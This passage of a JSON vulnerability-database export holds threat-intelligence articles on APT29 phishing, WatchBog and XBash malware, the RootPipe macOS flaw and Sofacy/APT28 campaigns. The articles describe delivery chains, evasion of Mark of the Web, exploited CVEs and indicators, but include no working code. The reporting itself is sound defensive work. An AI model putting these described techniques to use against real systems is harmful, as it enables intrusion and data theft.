"2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T11:21:00", "id": "THN:777A53E3DACA2E9D76D60AB889CFD10F", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-windows-10-11.html", "cvss": {"score": 4.6, "vector": 
"AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:35", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEg1htgV20xnZFGHy8xys5a3a8RDOEZB9kzl6RyaRUmt6zE03r6yB_FnqpjR1iu5tj48oBafZq6mQ2iT7IbFULnsgOYBOXm01lnZjwIF1anuI3nLsK7lL87KbyL1UWUYNDmzgkLRurzHi4oYNIEIxTxXzkVXRR89_meOuJ0FAHhdAvY6naUEmPbN4lFS>)\n\nThe Russia-linked threat actor known as APT29 targeted European diplomatic missions and Ministries of Foreign Affairs as part of a series of spear-phishing campaigns mounted in October and November 2021.\n\nAccording to ESET's [T3 2021 Threat Report](<https://www.welivesecurity.com/2022/02/09/eset-threat-report-t32021/>) shared with The Hacker News, the intrusions paved the way for the deployment of Cobalt Strike Beacon on compromised systems, followed by leveraging the foothold to drop additional malware for gathering information about the hosts and other machines in the same network.\n\nAlso tracked under the names The Dukes, Cozy Bear, and Nobelium, the advanced persistent threat group is an infamous cyber-espionage group that has been active for more than a decade, with its attacks targeting Europe and the U.S., before it gained widespread attention for the [supply\u2010chain compromise](<https://thehackernews.com/2022/02/new-malware-used-by-solarwinds.html>) of SolarWinds, leading to further infections in several downstream entities, including U.S. 
government agencies in 2020.\n\nThe spear-phishing attacks commenced with a COVID-19-themed phishing email impersonating the Iranian Ministry of Foreign Affairs and containing an HTML attachment that, when opened, prompts the recipients to open or save what appears to be an ISO disk image file (\"Covid.iso\").\n\nShould the victim opt to open or download the file, \"a small piece of JavaScript decodes the ISO file, which is embedded directly in the HTML attachment.\" The disk image file, in turn, includes an HTML application that's executed using [mshta.exe](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>) to run a piece of PowerShell code that ultimately loads the Cobalt Strike Beacon onto the infected system.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEglwgfTakz5tfhTSwDOMYonZpvaHlCIHm8s2Siv7LsnSe0W0dFfpgbBClJWSt9tMLfPmBA10CeMIEH53LnLbqlrg4zv9mKFmIl7GHJ76TVTXmsXgB8kdL4wAXSnI_z-0ph0Mzn4DlYyAAJOJF4XIwYxPtw_NiqMAtsbd7VscqKWz0U20rPFTUjqwiDP>)\n\nESET also characterized APT29's reliance on HTML and ISO disk images (or VHDX files) as an evasion technique orchestrated specifically to evade Mark of the Web ([MOTW](<https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/ms537628\\(v=vs.85\\)>)) protections, a security feature introduced by Microsoft to determine the origin of a file.\n\n\"An ISO disk image doesn't propagate the so-called Mark of the Web to the files inside the disk image,\" the researchers said. 
\"As such, and even if the ISO were downloaded from the internet, no warning would be displayed to the victim when the HTA is opened.\"\n\nUpon successfully gaining initial access, the threat actor delivered a variety of off-the-shelf tools to query the target's Active Directory ([AdFind](<https://www.joeware.net/freetools/tools/adfind/>)), execute commands on a remote machine using SMB protocol ([Sharp-SMBExec](<https://github.com/checkymander/Sharp-SMBExec>)), carry out reconnaissance ([SharpView](<https://github.com/tevora-threat/SharpView>)), and even an exploit for a Windows privilege escalation flaw ([CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)) to carry out follow-on attacks.\n\n\"Recent months have shown that The Dukes are a serious threat to western organizations, especially in the diplomatic sector,\" the researchers noted. \"They are very persistent, have good operational security, and they know how to create convincing phishing messages.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T10:46:00", "type": "thn", "title": "Russian APT Hackers Used COVID-19 Lures to Target European Diplomats", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-02-10T03:04:57", "id": "THN:894809E1ADF0684644DCCDD97F76BC73", "href": "https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:53", "description": "[](<https://thehackernews.com/images/-EUMkX9DWZUw/XTl2aLC2WFI/AAAAAAAA0jg/7Xl_-nE_HVUt9_1bnZYbpy7o3vPWCbGHwCLcBGAs/s728-e100/linux-malware-windows-bluekeep.jpg>)\n\nCybersecurity researchers have discovered a new variant of **WatchBog**, a Linux-based cryptocurrency mining malware botnet, which now also includes a module to scan the Internet for Windows RDP servers 
vulnerable to the [BlueKeep flaw](<https://thehackernews.com/2019/05/bluekeep-rdp-vulnerability.html>). \n \nBlueKeep is a highly critical, wormable, remote code execution vulnerability in the Windows Remote Desktop Services that could allow an unauthenticated remote attacker to take full control over vulnerable systems just by sending specially crafted requests over the RDP protocol. \n \nThough the [patches for the BlueKeep](<https://thehackernews.com/2019/05/microsoft-security-updates.html>) vulnerability (CVE-2019-0708) were already released by Microsoft in May this year, more than [800,000 Windows machines](<https://www.bitsight.com/blog/industry-response-to-bluekeep-vulnerability>) accessible over the Internet are still vulnerable to the critical flaw. \n \nFortunately, even after many individuals in the security community developed working remote code exploits for BlueKeep, there is no public proof-of-concept (PoC) exploit available to date, potentially preventing opportunistic hackers from wreaking havoc. \n \nHowever, cybersecurity firm Immunity just yesterday released an updated version of its commercial automated vulnerability assessment and penetration testing (VAPT) tool, CANVAS 7.23, which includes a new module for the BlueKeep RDP exploit. \n \nIt appears the attackers behind WatchBog are using their botnet network to prepare \"a list of vulnerable systems to target in the future or to sell to third party vendors for profit,\" warned the researchers from [Intezer Lab](<https://www.intezer.com/blog-watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/>), who discovered the new WatchBog variant. 
\n \n> \"The incorporation of the BlueKeep scanner by a Linux botnet may indicate WatchBog is beginning to explore financial opportunities on a different platform,\" the researchers said.\n\n \nThe BlueKeep scanner included in WatchBog scans the Internet and then submits the list of newly discovered RDP hosts, as a hexadecimal data string encrypted using RC4, to the attacker-controlled servers. \n\n\n[](<https://thehackernews.com/images/-vcIC_sHLKcs/XTly86EzVVI/AAAAAAAA0jU/AfdazQ8l2pk3kRCqjySyk2GL3XW7075NQCLcBGAs/s728-e100/BlueKeep-RDP-vulnerability-exploit.png>)\n\nAccording to the researchers, the new WatchBog variant has already compromised more than 4,500 Linux machines in the last two months. \n \nAlthough WatchBog has been operating since late last year, attackers are distributing its new variant in an ongoing campaign active since early June this year. \n \nThe newly discovered WatchBog variant includes a new spreading module along with exploits for some recently patched vulnerabilities in Linux applications, allowing attackers to find and compromise more Linux systems rapidly. \n \nThe WatchBog Linux botnet malware contains several modules, as outlined below, which leverage recently patched vulnerabilities in Exim, Jira, Solr, Jenkins, ThinkPHP and Nexus applications to compromise Linux machines. 
\n \n**Pwn Module** \n \n * CVE-2019-11581 (Jira)\n * CVE-2019-10149 (Exim)\n * CVE-2019-0192 (Solr)\n * CVE-2018-1000861 (Jenkins)\n * CVE-2019-7238 (Nexus Repository Manager 3)\n \n**Scanning Module** \n \n * BlueKeep Scanner\n * Jira Scanner\n * Solr Scanner\n \n**Brute-forcing Module** \n \n * CouchDB instances\n * Redis instances\n \n**Spreading Module** \n \n * Apache ActiveMQ (CVE-2016-3088)\n * Solr (CVE-2019-0192)\n * Code Execution over Redis\n \nAfter the scanning and brute-forcing modules discover a Linux machine running a vulnerable application, WatchBog deploys a script on the targeted machine to download Monero miner modules from the Pastebin website. \n \nThe malicious script then also gains persistence on the infected system via crontab and further downloads a new spreader module, which comes in the form of a dynamically linked Cython-compiled ELF executable. \n \nResearchers have recommended that Linux and Windows administrators keep their software and operating systems up to date against known vulnerabilities in order to avoid becoming victims of such attack campaigns. 
\n \nYou can check whether WatchBog has infected your Linux machine by looking for the \"/tmp/.tmplassstgggzzzqpppppp12233333\" file or the \"/tmp/.gooobb\" file on your system.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-25T09:38:00", "type": "thn", "title": "Linux Botnet Adding BlueKeep-Flawed Windows RDP Servers to Its Target List", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088", "CVE-2018-1000861", "CVE-2019-0192", "CVE-2019-10149", "CVE-2019-11581", "CVE-2019-7238"], "modified": "2019-07-25T11:08:32", "id": "THN:66694DD5D9C12B2B7881AB6C960E34DC", "href": "https://thehackernews.com/2019/07/linux-malware-windows-bluekeep.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:51", "description": "[](<https://thehackernews.com/images/-ygWTdRbnRzg/W6JjJNYdGkI/AAAAAAAAyKs/X2RZmectQkccC3bodz1NnV9uBrk228m-gCLcBGAs/s728-e100/ransomware-coin-mining-botnet-hacking-malware.jpg>)\n\nWindows and Linux users need to beware, as an all-in-one, destructive malware strain has been discovered in the wild that features multiple 
malware capabilities including ransomware, cryptocurrency miner, botnet, and self-propagating worm targeting Linux and Windows systems. \n \nDubbed XBash, the new malware is believed to be tied to the Iron Group, a.k.a. Rocke\u2014the Chinese-speaking APT group known for previous cyber attacks involving [ransomware](<https://thehackernews.com/2018/07/samsam-ransomware-attacks.html>) and [cryptocurrency miners](<https://thehackernews.com/2017/11/cryptocurrency-mining-javascript.html>). \n \nAccording to the researchers from security vendor Palo Alto Networks, who [uncovered](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/>) the malware, XBash is an all-in-one malware that features ransomware and cryptocurrency mining capabilities, as well as worm-like abilities similar to [WannaCry](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) or Petya/[NotPetya](<https://thehackernews.com/2017/10/ukraine-notpetya-cyberattack.html>). \n \nIn addition to self-propagating capabilities, XBash also contains a functionality, which is not yet implemented, that could allow the malware to spread quickly within an organization's network. \n \nDeveloped in Python, XBash hunts for vulnerable or unprotected web services and deletes databases such as MySQL, PostgreSQL, and [MongoDB](<https://thehackernews.com/2017/01/secure-mongodb-database.html>) running on Linux servers, as part of its ransomware capabilities. \n \n\n\n## Important: Paying Ransom Will Get You Nothing!\n\n \nXbash has been designed to scan for services on a target IP, on both TCP and UDP ports, such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. 
\n \nOnce it finds an open port, the malware uses a weak username and password dictionary attack to brute-force its way into the vulnerable service, and once in, deletes all the databases and then displays the ransom note. \n \nWhat's worrisome is that the malware itself does not contain any functionality that would allow the recovery of the deleted databases once a ransom amount has been paid by the victims. \n \nTo date, XBash has infected at least 48 victims who have already paid the ransom, making about $6,000 for the cybercriminals behind the threat. However, researchers see no evidence that the payments have resulted in the recovery of data for the victims. \n \nThe malware also has capabilities to add targeted Linux-based systems to a botnet. \n \n\n\n## XBash Malware Exploits Flaws in Hadoop, Redis, and ActiveMQ\n\n \nOn the other hand, XBash targets Microsoft Windows machines only for cryptocurrency mining and self-propagation. For self-propagation, it exploits three known vulnerabilities in Hadoop, Redis, and ActiveMQ: \n \n * Hadoop YARN ResourceManager unauthenticated command execution bug, disclosed in October 2016, with no CVE number assigned.\n * Redis arbitrary file write and remote command execution vulnerability, disclosed in October 2015, with no CVE number assigned.\n * ActiveMQ arbitrary file write vulnerability (CVE-2016-3088), disclosed in early 2016.\n \n \nIf the entry point is a vulnerable Redis service, Xbash will send a malicious JavaScript or VBScript payload for downloading and executing a [coinminer for Windows](<https://thehackernews.com/2018/03/cryptocurrency-mining-malware.html>) instead of its botnet and ransomware module. \n \nAs mentioned above, Xbash is developed in Python and then converted to a Portable Executable (PE) using PyInstaller, which can create binaries for multiple platforms, including Windows, Apple macOS, and Linux, and also provides anti-detection. 
\n \nThis, in turn, enables XBash to be truly [cross-platform malware](<https://thehackernews.com/2017/07/adwind-rat-malware.html>), though, at the time of writing, researchers found samples only for Linux and did not see any Windows or macOS versions of Xbash. \n \nUsers can protect themselves against XBash by following basic cybersecurity practices, including: \n \n * change default login credentials on your systems,\n * use strong and unique passwords,\n * keep your operating system and software up to date,\n * avoid downloading and running untrusted files or clicking links,\n * back up your data regularly, and\n * prevent unauthorized connections using a firewall.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-19T15:32:00", "type": "thn", "title": "New Malware Combines Ransomware, Coin Mining and Botnet Features in One", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2018-09-19T15:32:57", "id": "THN:E2ECFA2AA521F10B7A62A00D2F722C90", "href": "https://thehackernews.com/2018/09/ransomware-coinmining-botnet.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-27T10:06:49", "description": "[](<https://1.bp.blogspot.com/-KsHO5bnbexQ/VTYmA7yvE9I/AAAAAAAAipQ/RIcQv54Ke0U/s1600/rootpipe-mac-os-x-vulnerability.jpg>)\n\nSad but true! Your Apple Mac computer is vulnerable to a serious privilege escalation flaw, dubbed \"RootPipe,\" even if you are running the latest version of Mac OS X.\n\n**What\u2019s RootPipe?**\n\nBack in October 2014, a Swedish White Hat hacker _Emil Kvarnhammar_ claimed to have [discovered](<http://www.macworld.co.uk/news/mac-software/swedish-hacker-finds-serious-vulnerability-in-os-x-yosemite-3583723/>) a critical privilege escalation vulnerability, which he dubbed \"_RootPipe_,\" in some versions of Mac OS X, including the then-newest version 10.10 Yosemite.\n\nThe vulnerability (_CVE-2015-1130_) could allow an attacker to take full control of your desktop Mac computer or MacBook laptop, even without any authentication.\n\nKeeping in mind the devastating effect of the RootPipe vulnerability, the researcher privately reported the flaw to Apple and did not disclose the details of the flaw publicly until the company released a patch to fix it.\n\n**Apple did release an update but failed to patch RootPipe:**\n\nEarlier this month, Apple released the latest version of Mac OS X Yosemite, i.e. 
OS X Yosemite 10.10.3, and claimed to have fixed the so-called RootPipe backdoor, which had been residing on Mac computers since 2011.\n\nHowever, the company did not fix the flaw in the older versions (below 10.10) of the operating system due to an uncodified Apple policy on patching, leaving tens of millions of Mac users at risk.\n\n> \"_Apple indicated that this issue required a substantial amount of changes on their side and that they would not backport the fix to 10.9.x and older_,\" Kvarnhammar said in a [blog post](<https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/>) on the TrueSec website.\n\n**But here\u2019s the worst part:**\n\nApple\u2019s RootPipe vulnerability patch for Mac OS X Yosemite 10.10.3 is [claimed](<https://www.forbes.com/sites/thomasbrewster/2015/04/19/apple-fails-to-patch-rootpipe/>) to be itself vulnerable, which again left all the Mac machines vulnerable to the RootPipe attacks.\n\nHoly Crap!\n\nPatrick Wardle, an ex-NSA staffer and current director of R&D at Synack, claimed to have discovered a new way around Apple's security fix to re-abuse the RootPipe vulnerability, again opening a path to the highest privilege level \u2013 root access.\n\nThough this time, the attack requires a hacker to have gained local privileges, which could most likely be obtained via a working exploit of other software sitting on Mac machines.\n\n**Here\u2019s the Video Demonstration:**\n\nWardle has demonstrated his hack attack in action in a video proof-of-concept (POC), which you can watch below:\n\nWardle has already reported his findings to Apple\u2019s security team and will [not disclose](<https://objective-see.com/blog.html>) the details of his attack code publicly until the company issues a complete and unbreakable fix.\n\nNow, let's just hope Apple delivers a tough fix for the RootPipe backdoor this time. 
Last time the company took nearly six months to release a patch that was fooled by Wardle sitting on a flight.\n", "cvss3": {}, "published": "2015-04-20T23:31:00", "type": "thn", "title": "Apple Failed to Patch Rootpipe Mac OS X Yosemite Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-1130"], "modified": "2015-04-21T10:31:24", "id": "THN:AC9FE9EB5F1C5B026F0BCF1D4D883160", "href": "https://thehackernews.com/2015/04/rootpipe-mac-os-x-vulnerability.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2018-03-07T22:51:46", "description": "\n\nSofacy, also known as APT28, Fancy Bear, and Tsar Team, is a highly active and prolific [APT](<https://securelist.com/threats/apt-advanced-persistent-threats-glossary?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). From their high-volume 0day deployment to their innovative and broad malware set, Sofacy is one of the top groups that we monitor, report on, and protect against. 2017 was not any different in this regard. Our private reports subscription customers receive a steady stream of [YARA](<https://securelist.com/threats/yara-glossary?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) rules, IOCs, and reports on Sofacy, our most reported APT for the year.\n\nThis high level of cyber-espionage activity goes back years. In 2011-2012, the group used a relatively tiny implant (known as \"Sofacy\" or SOURFACE) as their first stage malware, which at the time had similarities with the old Miniduke implants. This made us believe the two groups were connected, although it looks like they split ways at a certain point, with the original Miniduke group switching to the CosmicDuke implant in 2014. 
The division in malware was consistent and definitive at that point.\n\nIn 2013, the Sofacy group expanded their arsenal and added more backdoors and tools, including CORESHELL, SPLM (aka Xagent, aka CHOPSTICK), JHUHUGIT (which is built with code from the Carberp sources), AZZY (aka ADVSTORESHELL, NETUI, EVILTOSS, and spans across 4-5 generations) and a few others. We've seen quite a few versions of these implants, which were relatively widespread at some point or still are. In 2015 we noticed [another wave of attacks](<https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/>) which took advantage of a new release of the AZZY implant, largely undetected by antivirus products. The new wave of attacks included a new generation of USB stealers deployed by Sofacy, with initial versions dating to February 2015. It appeared to be geared exclusively towards high profile targets.\n\nSofacy's reported presence in the DNC network alongside APT29 brought possibly the highest level of public attention to the group's activities in 2016, especially when data from the compromise was leaked and \"weaponized\". And later in 2016, their focus turned towards the Olympics and the World Anti-Doping Agency (WADA) and Court of Arbitration for Sports (CAS), when individuals and servers in these organizations were phished and compromised. In a similar vein with past CyberBerkut activity, attackers hid behind anonymous activist groups like \"anonpoland\", and data from victimized organizations was similarly leaked and \"weaponized\".\n\nThis write-up will survey notable points from Sofacy activity in the past year, 2017, including their targeting, technology, and notes on their infrastructure. No one research group has 100% global visibility, and our collected data is presented accordingly. 
Here, external APT28 reports on 2017 [Darkhotel](<https://securelist.com/the-darkhotel-apt/66779/>)-style activity [in Europe](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) and [Dealer's Choice](<https://researchcenter.paloaltonetworks.com/2016/12/unit42-let-ride-sofacy-groups-dealerschoice-attacks-continue/>) spearphishing are of interest. From where we sit, 2017 Sofacy activity starts with a heavy focus on NATO and Ukrainian partners, coinciding with lighter interest in Central Asian targets, and finishes the second half of the year with a heavy focus on Central Asian targets and some shift further East.\n\n[](<https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/02/07163041/180220-sofacy-review-1.png>)\n\n## **Dealer's Choice**\n\n2017 began with a slow cleanup following the Dealer's Choice campaign, with technical characteristics documented by our colleagues at Palo Alto in several stages at the end of 2016. The group spearphished targets in several waves with Flash exploits leading to their Carberp-based JHUHUGIT downloaders and further stages of malware. It seems that many folks did not log in and pull down their emails until Jan 2017 to retrieve the Dealer's Choice spearphish. Throughout these waves, we observed that the targets had a connection, even if tangential, to Ukraine and NATO military and diplomatic interests.\n\nIn multiple cases, Sofacy spoofs the identity of a target, and emails a spearphish to other targets of interest. Often these are military or military-technology and manufacturing related, and here, the DealersChoice spearphish is again NATO related:\n\n[](<https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/02/07163036/180220-sofacy-review-2.png>)\n\nThe global reach that coincided with this focus on NATO and the Ukraine couldn't be overstated. 
Our KSN data showed spearphishing targets geolocated across the globe into 2017. \nAM, AZ, FR, DE, IQ, IT, KG, MA, CH, UA, US, VN\n\nDealersChoice emails, like the one above, that we were able to recover from third party sources provided additional targeting insight, and confirmed some of the targeting within our KSN data: \nTR, PL, BA, AZ, KR, LV, GE, LV, AU, SE, BE\n\n## **0day Deployment(s)**\n\nSofacy kicked off the year deploying two 0days in a spearphish document: a Microsoft Office Encapsulated PostScript type confusion exploit (abusing [CVE-2017-0262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0262>)) and an escalation of privilege use-after-free exploit (abusing [CVE-2017-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263>)). The group attempted to deploy this spearphish attachment to push a small 30kb backdoor known as GAMEFISH to targets in Europe at the beginning of 2017. They took advantage of the Syrian military conflict for thematic content and file naming (\"Trump's_Attack_on_Syria_English.docx\"). Again, this deployment was likely a part of their focus on NATO targets.\n\n## **Light SPLM deployment in Central Asia and Consistent Infrastructure**\n\nMeanwhile, in early-to-mid 2017, SPLM/CHOPSTICK/XAgent detections in Central Asia provided a glimpse into ongoing focus on ex-Soviet republics in Central Asia. These particular detections are interesting because they indicate an attempted selective second-stage deployment of a backdoor maintaining file stealer, keylogger, and remote shell functionality to a system of interest. As the latest revision of the backdoor, portions of SPLM didn't match previous reports on SPLM/XAgent while other similarities were maintained. SPLM 64-bit modules already appeared to be at version 4 of the software by May of the year. 
Targeting profiles included defense related commercial and military organizations, and telecommunications.\n\nTargeting included TR, KZ, AM, KG, JO, UK, UZ\n\n[](<https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/02/07163030/180220-sofacy-review-3.png>)\n\n## **Heavy Zebrocy deployments**\n\nSince mid-November 2015, the threat actor referred to as \"Sofacy\" or \"APT28\" has been utilizing a unique payload and delivery mechanism written in Delphi and AutoIt. We collectively refer to this package and related activity as \"Zebrocy\" and had written a few reports on its usage and development by June 2017; Sofacy developers modified and redeployed incremented versions of the malware. The Zebrocy chain follows a pattern: spearphish attachment -> compiled AutoIt script (downloader) -> Zebrocy payload. In some deployments, we observed Sofacy actively developing and deploying a new package to a much smaller, specific subset of targets within the broader set.\n\nTargeting profiles, spearphish filenames, and lures carry thematic content related to visa applications and scanned images, border control administration, and various administrative notes. Targeting appears to be widely spread across the Middle East, Europe, and Asia:\n\n * Business accounting practices and standards\n * Science and engineering centers\n * Industrial and hydrochemical engineering and standards/certification\n * Ministry of foreign affairs\n * Embassies and consulates\n * National security and intelligence agencies\n * Press services\n * Translation services\n * NGO - family and social service\n * Ministry of energy and industry\n\nWe identified new MSIL components deployed by Zebrocy. While recent Zebrocy versioning was 7.1, some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0. The components were an unexpected inclusion in this particular toolset. 
For example, one sent out to a handful of countries identifies network drives when they are added to target systems, and then encrypts certain file metadata and contents with an RC4-like cipher and writes them to a local path for later exfiltration. The stealer searches for files of 60 MB or less with these extensions:\n\n * .doc\n * .docx\n * .xls\n * .xlsx\n * .ppt\n * .pptx\n * .exe\n * .zip\n * .rar\n\nAt execution, it installs an application-defined Windows hook. The hook receives Windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its \"RecordToFile\" file stealer method.\n\n[](<https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/02/07163025/180220-sofacy-review-4.png>)\n\nZebrocy spearphishing targets: \nAF, AM, AU, AZ, BD, BE, CN, DE, ES, FI, GE, IL, IN, JO, KW, KG, KZ, LB, LT, MN, MY, NL, OM, PK, PO, SA, ZA, SK, SE, CH, TJ, TM, TR, UA, UAE, UK, US, UZ\n\n## **SPLM deployment in Central Asia**\n\nSPLM/CHOPSTICK components deployed throughout 2017 were native 64-bit modular C++ Windows COM backdoors supporting HTTP over fully encrypted TLSv1 and TLSv1.2 communications, mostly deployed in the second half of 2017 by Sofacy. Earlier SPLM activity deployed 32-bit modules over unencrypted HTTP (and sometimes SMTP) sessions. In 2016 we saw fully functional, very large SPLM/X-Agent modules supporting OS X.\n\nThe executable module continues to be part of a framework supporting various internal and external components communicating over internal and external channels, maintaining slightly morphed encryption and functionality per deployment. Sofacy has selectively used SPLM/CHOPSTICK modules as second-stage implants against high-interest targets for years now. 
In a change from previous compilations, the module was structured and used to inject remote shell, keylogger, and filesystem add-ons into processes running on victim systems, while maintaining functionality that was originally present within the main module.\n\nThe newer SPLM modules are deployed mostly to Central Asian based targets that may have a tie to NATO in some form. These targets include foreign affairs government organizations, both local and abroad, and the local presence of defense organizations, located in Europe and also in Afghanistan. One outlier SPLM target profile within our visibility includes an audit and consulting firm in Bosnia and Herzegovina.\n\nMinor changes and updates to the code were released with these deployments, including a new mutex format and the exclusive use of encrypted HTTP communications over TLS. The compiled code itself is already altered per deployment in multiple subtle ways, in order to stymie identification and automated analysis and accommodate targeted environments. Strings (C2 domains and functionality, error messages, etc.) are custom encrypted per deployment.\n\nTargets: TR, KZ, BA, TM, AF, DE, LT, NL\n\n## **SPLM/CHOPSTICK/XAgent Modularity and Infrastructure**\n\nThis subset of SPLM/CHOPSTICK activity leads into several small surprises that take us into 2018, to be discussed in further detail at SAS 2018. The group demonstrates malleability and innovation in maintaining and producing familiar SPLM functionality, but the pragmatic and systematic approach towards producing undetected or difficult-to-detect malware continues. 
Changes in the second stage SPLM backdoor are refined, making the code reliably modular.\n\n## **Infrastructure Notes**\n\nSofacy set up and maintained multiple servers and c2 for varying durations, registering fairly recognizable domains with privacy services, registrars that accept bitcoin, fake phone numbers, phony individual names, and 1 to 1 email address to domain registration relationships. Some of this activity and patterns were publicly disclosed, so we expect to see more change in their process in 2018. Also, throughout the year and in previous years, researchers began to comment publicly on Sofacy's fairly consistent infrastructure setup.\n\nAs always, attackers make mistakes and give away hints about what providers and registrars they prefer. It's interesting to note that this version of SPLM implements communications that are fully encrypted over HTTPS. As an example, we might see extraneous data in their SSL/TLS certificates that give away information about their provider or resources. Leading up to summer 2017, infrastructure mostly was created with PDR and Internet Domain Service BS Corp, and their resellers. Hosting mostly was provided at Fast Serv Inc and resellers, in all likelihood related to bitcoin payment processing.\n\nAccordingly, the server side certificates appear to be generated locally on VPS hosts that exclusively are paid for at providers with bitcoin merchant processing. One certificate was generated locally on what appeared to be a HP-UX box, and another was generated on \"8569985.securefastserver[.]com\" with an email address \"root@8569985.securefastserver[.]com\", as seen here for their nethostnet[.]com domain. 
